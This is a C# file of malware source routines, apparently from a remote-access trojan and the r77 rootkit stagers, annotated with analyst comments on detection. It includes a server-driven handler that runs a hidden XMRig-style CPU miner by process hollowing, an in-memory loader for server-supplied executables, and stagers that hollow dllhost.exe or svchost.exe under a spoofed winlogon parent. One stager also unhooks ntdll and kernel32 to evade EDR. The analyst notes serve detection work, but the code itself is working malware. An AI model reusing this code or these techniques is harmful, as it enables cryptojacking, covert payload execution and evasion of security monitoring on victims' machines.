/// <summary>
/// Handler for a server message that starts a CPU miner on the client.
/// Every value that shapes the launch (file name, host binary name, pool, wallet, password)
/// is read from the server-supplied message; nothing is validated locally.
/// </summary>
/// <param name="unpack_msgpack">Decoded server message. Fields read here: "Hash", "InjectTo", "Pool", "Wallet", "Pass".</param>
public void RunMiner(MsgPack unpack_msgpack)
{
    try
    {
        // Expected location of the miner image: <temp directory> + <Hash> + ".bin".
        // Analyst note: a server-named *.bin file in the user's temp directory is the on-disk artifact of this routine.
        string xmrig = Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin";

        // File name of the binary that will be used as the host process (resolved against the .NET runtime directory below).
        string injectTo = unpack_msgpack.ForcePathObject("InjectTo").AsString;

        // Miner option string. The thread count is half of Environment.ProcessorCount; pool, wallet and password
        // are inserted verbatim from the server message.
        // NOTE(review): whether this string becomes the visible command line of the host process depends on RunPE.Run,
        // which is not shown here. If it does, the option pattern is a usable command-line detection.
        string args = $"-B --donate-level=1 -t {Environment.ProcessorCount / 2} -v 0 --cpu-priority=3 -a cn/r -k -o {unpack_msgpack.ForcePathObject("Pool").AsString} -u {unpack_msgpack.ForcePathObject("Wallet").AsString} -p {unpack_msgpack.ForcePathObject("Pass").AsString}";

        if (!File.Exists(xmrig))
        {
            // Miner image is not on disk yet: send a "GetXmr" packet to the server and stop.
            // Nothing is launched in this call.
            MsgPack msgpack = new MsgPack();
            msgpack.ForcePathObject("Packet").AsString = "GetXmr";
            Connection.Send(msgpack.Encode2Bytes());
            return;
        }

        // Stop any previous miner instance before starting a new one (KillMiner is defined elsewhere).
        KillMiner();

        // Host path: the runtime directory with "Framework64" rewritten to "Framework", i.e. the 32-bit
        // .NET Framework directory, combined with the server-chosen file name.
        // The stored .bin file is read, passed through Zip.Decompress and handed to RunPE.Run together with the options.
        // Analyst note: a binary from the .NET Framework directory showing sustained CPU use and outbound
        // connections to a mining pool is the runtime symptom to look for.
        if (RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injectTo), Zip.Decompress(File.ReadAllBytes(Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin")), args, false))
        {
            // Records "1" under the client's hardware id on success.
            // NOTE(review): presumably a registry-backed "miner running" marker; SetRegistry is not shown, so confirm.
            SetRegistry.SetValue(Connection.Hwid, "1");
        }
    }
    catch (Exception ex)
    {
        // Any failure is reported back to the server as an error message.
        Packet.Error(ex.Message);
    }
}
// The target framework is .NET 3.5.
// Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
// However, the target framework is not relevant in the powershell context.
// The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
// To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
//
// Analyst summary: this entry point decrypts and decompresses two embedded resources (32-bit and 64-bit
// service images) and starts one of them inside a dllhost.exe process via RunPE.Run, passing a
// dllhost-style command line and the process id of winlogon as the parent.
public static void Main()
{
    // Process.EnterDebugMode() enables SeDebugPrivilege for the current process, so this stage
    // needs to be running with administrative rights for the call to have effect.
    Process.EnterDebugMode();

    // Get r77 service executable.
    // Both images are embedded in the stager's resources and only exist decrypted in memory here.
    byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
    byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));

    // Executable to be used for process hollowing.
    string path = @"C:\Windows\System32\dllhost.exe";
    string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe";
    string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect).

    // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
    // Analyst note: the resulting process tree shows dllhost.exe as a child of winlogon.exe with a
    // "/Processid:{GUID}" argument whose GUID is random rather than a registered identifier.
    // NOTE(review): both properties look usable as detections; confirm against a baseline of the environment.
    int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;

    // Create the 32-bit and 64-bit instance of the r77 service.
    // IntPtr.Size is the bitness of this stager process: 4 selects the SysWOW64 host with the 32-bit image,
    // otherwise the System32 host with the 64-bit image. A 32-bit OS always gets the 32-bit image.
    if (Helper.Is64BitOperatingSystem())
    {
        if (IntPtr.Size == 4)
        {
            RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
        }
        else
        {
            RunPE.Run(path, commandLine, payload64, parentProcessId);
        }
    }
    else
    {
        RunPE.Run(path, commandLine, payload32, parentProcessId);
    }
}
// Loads Payload.exe (native executable) from resources and injects into suitable OS executable.
// This stage is required to be C#, because the startup stage may only contain C# code with a maximum of 260 characters for the commandline.
// The next stage is the actual payload, which is required to be a native executable in order to be injected.
//
// Analyst summary: the payload is carried encrypted and compressed in the assembly's resources and is
// handed to RunPE.Run as a byte array; this method itself writes nothing to disk.
public static void Main()
{
    // Host selection: SysWOW64\svchost.exe on a 64-bit OS, System32\svchost.exe on a 32-bit OS.
    // Both choices are 32-bit images, so the payload is presumably 32-bit (confirm against the resource).
    string path = Environment.Is64BitOperatingSystem ? @"C:\Windows\SysWOW64\svchost.exe" : @"C:\Windows\System32\svchost.exe";

    // Decrypt, then decompress, the embedded payload. Decrypt/Decompress are defined elsewhere.
    byte[] payload = Decompress(Decrypt(Resources.Payload));

    // No command line or parent process is passed in this call.
    // NOTE(review): an svchost.exe instance started from the SysWOW64 directory by a non-service parent,
    // or without the usual service-group argument, is the process-creation anomaly to alert on.
    // Whether RunPE.Run supplies any arguments itself is not visible here.
    RunPE.Run(path, payload);
}
/// <summary>
/// Handler for a server message that delivers an executable to be run without first saving it to disk
/// in this method. Two paths exist: in-process managed loading when "Inject" is empty, or
/// RunPE.Run into a named .NET Framework binary otherwise. The connection is dropped afterwards.
/// </summary>
/// <param name="unpack_msgpack">Decoded server message. Fields read here: "File" (compressed bytes) and "Inject" (host file name, may be empty).</param>
public void SendToMemory(MsgPack unpack_msgpack)
{
    try
    {
        // Compressed payload bytes and optional host binary name, both taken from the server message.
        byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
        string injection = unpack_msgpack.ForcePathObject("Inject").AsString;

        if (injection.Length == 0)
        {
            // Reflection path: the decompressed bytes are loaded as a managed assembly inside the
            // current process and its entry point is invoked on a background thread.
            // Analyst note: Assembly.Load(byte[]) leaves no backing file for the module; CLR loader
            // telemetry showing an assembly without a file path is the signal for this branch.
            new Thread(delegate()
            {
                try
                {
                    Assembly loader = Assembly.Load(Methods.Decompress(buffer));
                    object[] parm = null;

                    // An entry point that declares parameters (e.g. Main(string[] args)) receives a
                    // one-element string array containing null; a parameterless one receives nothing.
                    if (loader.EntryPoint.GetParameters().Length > 0)
                    {
                        parm = new object[] { new string[] { null } };
                    }

                    loader.EntryPoint.Invoke(null, parm);
                }
                catch (Exception ex)
                {
                    // Load or invocation failures are reported back to the server.
                    Packet.Error(ex.Message);
                }
            }) { IsBackground = true }.Start();
        }
        else
        {
            // RunPE path: the host is the server-named file inside the runtime directory with
            // "Framework64" rewritten to "Framework" (the 32-bit .NET Framework directory).
            // The decompressed bytes are passed with an empty argument string.
            // NOTE(review): the meaning of the final boolean (true here, false in RunMiner) is defined
            // by RunPE.Run, which is not shown.
            new Thread(delegate()
            {
                try
                {
                    RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true);
                }
                catch (Exception ex)
                {
                    Packet.Error(ex.Message);
                }
            }) { IsBackground = true }.Start();
        }
    }
    catch (Exception ex)
    {
        // Failures while reading the message fields are reported back to the server.
        Packet.Error(ex.Message);
    }

    // Called on every path, including after an exception: the handler always ends by
    // signalling a disconnect. The worker threads above are background threads and are not awaited.
    Connection.Disconnected();
}
// The target framework is .NET 3.5.
// Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
// However, the target framework is not relevant in the powershell context.
// The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
// To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
//
// Analyst summary: same flow as a plain stager (decrypt embedded service images, start one inside
// dllhost.exe with winlogon as the parent), preceded by a step that removes user-mode hooks from
// ntdll.dll and, on most systems, kernel32.dll.
public static void Main()
{
    // Unhook DLL's that are monitored by EDR.
    // Otherwise, the call sequence analysis of process hollowing gets detected and the stager is terminated.
    // Analyst note: after this call, monitoring that relies only on in-process hooks in these DLLs
    // may not observe the API calls that follow. Coverage should not depend on user-mode hooks alone;
    // NOTE(review): telemetry collected outside the process is presumably unaffected by what is shown here.
    Unhook.UnhookDll("ntdll.dll");

    if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == 8)
    {
        // Unhooking kernel32.dll on Windows 7 x86 fails.
        //TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails.
        // The condition skips kernel32.dll only for a 32-bit process on an OS version below 10.
        Unhook.UnhookDll("kernel32.dll");
    }

    // Process.EnterDebugMode() enables SeDebugPrivilege for the current process, so this stage
    // needs to be running with administrative rights for the call to have effect.
    Process.EnterDebugMode();

    // Get r77 service executable.
    // Both images are embedded in the stager's resources and only exist decrypted in memory here.
    byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
    byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));

    // Executable to be used for process hollowing.
    string path = @"C:\Windows\System32\dllhost.exe";
    string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe";
    string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect).

    // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
    // Analyst note: the resulting process tree shows dllhost.exe as a child of winlogon.exe with a
    // "/Processid:{GUID}" argument whose GUID is random rather than a registered identifier.
    // NOTE(review): both properties look usable as detections; confirm against a baseline of the environment.
    int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;

    // Create the 32-bit and 64-bit instance of the r77 service.
    // IntPtr.Size is the bitness of this stager process: 4 selects the SysWOW64 host with the 32-bit image,
    // otherwise the System32 host with the 64-bit image. A 32-bit OS always gets the 32-bit image.
    if (Helper.Is64BitOperatingSystem())
    {
        if (IntPtr.Size == 4)
        {
            RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
        }
        else
        {
            RunPE.Run(path, commandLine, payload64, parentProcessId);
        }
    }
    else
    {
        RunPE.Run(path, commandLine, payload32, parentProcessId);
    }
}
/// <summary>
/// Thin wrapper that forwards an executable image and a target to RunPE.Run.
/// </summary>
/// <param name="payload">Raw bytes of the executable image handed to RunPE.Run.</param>
/// <param name="target">Target passed through unchanged. NOTE(review): presumably the path of the host executable; confirm against RunPE.Run.</param>
public void Inject(byte[] payload, string target)
{
    //Add actions if RunPe.Run returns false
    // The result of RunPE.Run is discarded, so this method reports nothing to its caller and
    // logs nothing itself. Any evidence of the operation has to come from process-creation
    // and memory telemetry rather than from this component.
    RunPE.Run(payload, target);
}